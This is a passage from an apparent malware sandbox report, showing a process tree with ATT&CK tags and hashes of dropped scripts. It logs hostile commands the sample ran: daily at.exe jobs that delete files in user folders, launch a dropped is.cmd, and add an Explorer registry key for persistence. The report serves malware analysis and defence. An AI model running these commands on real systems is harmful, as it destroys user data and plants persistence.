                                                              at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4264
                                                            • C:\Windows\SysWOW64\at.exe
                                                              at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2236
                                                            • C:\Windows\SysWOW64\at.exe
                                                              at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1552
                                                            • C:\Windows\SysWOW64\at.exe
                                                              at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                              4⤵
                                                                PID:456
                                                              • C:\Windows\SysWOW64\at.exe
                                                                at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                                4⤵
                                                                  PID:3528
                                                                • C:\Windows\SysWOW64\at.exe
                                                                  at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
                                                                  4⤵
                                                                    PID:3052
                                                                  • C:\Windows\SysWOW64\at.exe
                                                                    at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3472
                                                                  • C:\Windows\SysWOW64\at.exe
                                                                    at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4816
                                                                  • C:\Windows\SysWOW64\at.exe
                                                                    at 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
                                                                    4⤵
                                                                      PID:2908
                                                                    • C:\Windows\SysWOW64\at.exe
                                                                      at 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1460
                                                                    • C:\Windows\SysWOW64\at.exe
                                                                      at 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4372
                                                                    • C:\Windows\SysWOW64\at.exe
                                                                      at 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
                                                                      4⤵
                                                                        PID:4468
                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                  1⤵
                                                                    PID:1712
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                    1⤵
                                                                      PID:4360
                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                      1⤵
                                                                        PID:3944

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver76D1.tmp

                                                                        Filesize

                                                                        15KB

                                                                        MD5

                                                                        1a545d0052b581fbb2ab4c52133846bc

                                                                        SHA1

                                                                        62f3266a9b9925cd6d98658b92adec673cbe3dd3

                                                                        SHA256

                                                                        557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

                                                                        SHA512

                                                                        bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\W9QJOIKH\suggestions[1].en-US

                                                                        Filesize

                                                                        17KB

                                                                        MD5

                                                                        5a34cb996293fde2cb7a4ac89587393a

                                                                        SHA1

                                                                        3c96c993500690d1a77873cd62bc639b3a10653f

                                                                        SHA256

                                                                        c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

                                                                        SHA512

                                                                        e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

                                                                        Filesize

                                                                        1010B

                                                                        MD5

                                                                        67f275be0cba17ec6a8600b7a7a96bb7

                                                                        SHA1

                                                                        96ab9e91d456dfd086ee741a7b108eacbc6da7bb

                                                                        SHA256

                                                                        839a792abb4dc63b180abfd352ca79b026287cfa9739766861bbdf1d3a6dd98f

                                                                        SHA512

                                                                        b48f53ae67147ad28c9ef796102c78a0c0dd8e035d28e503a6393a15f706db0ed31635c3c361195337c94e5854cfb83ffd3995f8b59787e3caae92534b8fc8d4

                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

                                                                        Filesize

                                                                        276B

                                                                        MD5

                                                                        05b65aa7868e4bb260e88fc956d5506e

                                                                        SHA1

                                                                        468bc7e2aa2ab62857f29eff1195f98a5484b4d0

                                                                        SHA256

                                                                        4e9f3b727bcabff0b264f3b2ca5e502a525a6d036a821a84b9aa25c2f0c8227a

                                                                        SHA512

                                                                        4d556a5503dbc171f679a345803a61bd387a73475ac54172d8ec1b70922b95c86d20ad62d4d2703dce4c9c8367659ddcc08bedc2677ca43a25ac39e7c7fb4118

                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\huacai.vbs

                                                                        Filesize

                                                                        337B

                                                                        MD5

                                                                        b6bd65cfd7281f4596867a9b1b24c30d

                                                                        SHA1

                                                                        cb10730772b45e0a41eef4a96e85cd23bbb28798

                                                                        SHA256

                                                                        797350e60de3cff6f13056abdab3171cd0821a1b95da8f8942c49030faed0ac8

                                                                        SHA512

                                                                        513ef303e875a609c1731aef61ae124652923989cd0efa1b109e51204a705e1111e2e91bf4807f483bc44900c4061b54b6806cd357886743209d2ca3a85bb427

                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd

                                                                        Filesize

                                                                        99B

                                                                        MD5

                                                                        1a9bba5fd15a82f64b6d065a16c25496

                                                                        SHA1

                                                                        25736f87c42be115e3123cb84046621e292e3ba0

                                                                        SHA256

                                                                        58856f5a05acfffd349e1fff2413641345c0a07491d0c75b133285889fcad68d

                                                                        SHA512

                                                                        d795c173439555213927efaf96e1d5eb0df14bb958179d8e3922c218b33b94691b50a39b23fc9146a48763d4849103b8514194f97e91e58076fe44f36d808e05

                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.cmd

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        6d7ff34270c389fe244657786c453255

                                                                        SHA1

                                                                        7db19943595a3525fb03908c80b745e6b9d96967

                                                                        SHA256

                                                                        2b902c327edc8791396d0ea7db3ee9ffcfcf3bf73f741d921c514cb11bbebd31

                                                                        SHA512

                                                                        d5dbb7f543b6c78656fea157aea23fd58c4f8eff6b02ef243adbc2be5c832a55d04da72a44cd1684c277bd9723a399bfdb2bde4dc516fd5f46cde59a16319d68

                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\to.cmd

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        1a1353284d2b018b157d84837c6b7bec

                                                                        SHA1

                                                                        e694db1791e76843b7f6423d3eed883a9e5baa15

                                                                        SHA256

                                                                        2d57480747019a3bea799bbb4119fe258b7d74fd04632d3e2f984387b64032a4

                                                                        SHA512

                                                                        18a0158f08c83a5976192bb61fde39a1ed6185edd3bcbd75e41d875b3b9b7f67f8430f81469b5d676cd9eb91d66cc33e72d9793058bd56a23b05e1bfe8f7013b

                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs

                                                                        Filesize

                                                                        695B

                                                                        MD5

                                                                        78e7c9252108196c8a479b2c863a5d66

                                                                        SHA1

                                                                        c4430fca72196e950c2fe2edd7aac97e93176ef4

                                                                        SHA256

                                                                        f25780ada59d4dc18e5fc553ef78e6d5a9cb643962b074be3f79ddcc0f205233

                                                                        SHA512

                                                                        391ac4715ddc854e5e3c9eb7e0a5f9f0b2b9721f87af8ecbc04204b8e3b148d9afb99f54ccc11fc62fe6d498cfd813db09c519771ea48b207c05a84f7f1b0e81